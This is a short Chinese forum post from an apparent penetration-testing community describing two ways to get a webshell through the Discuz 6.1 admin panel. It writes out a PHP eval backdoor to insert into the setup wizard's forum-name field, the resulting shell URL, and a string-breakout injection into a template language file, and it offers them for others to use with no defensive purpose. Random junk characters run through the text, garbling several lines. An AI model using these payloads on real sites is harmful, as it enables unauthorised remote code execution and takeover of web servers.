中国网络渗透测试联盟

标题: discuz6.1后台拿shell方法 [打印本页]

作者: admin    时间: 2012-9-13 16:59
标题: discuz6.1后台拿shell方法
discuz6.1两种方法后台拿shell) O# d- C# M- f& _3 d
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
$ E- U, l! W) {1:6 @# q' s7 g- x" ^) E
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
/ U% T" Q' T2 p; c) Vadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
: ]4 |3 {, q5 w+ W" |* T( h7 Z<?php eval($_POST[cmd]);?>: L/ X+ j) a8 W
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php' K" G" V! ]2 p( d

9 l1 i! b! D5 k9 @9 j6 a( \
6 e* H) ]3 N  }0 M2:后台模板管理--默认模板套系--详情
$ L# n4 r3 B: W! p  t' b" dtemplates/default/actions.lang.php
' W8 L5 n2 F6 _( v, fjhackj\\');eval($_POST[cmd])?>;//
6 @0 y3 m# u$ ]+ }; N
( h7 D; e6 @; [8 V利用很简单,聪明的人一看就懂了




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2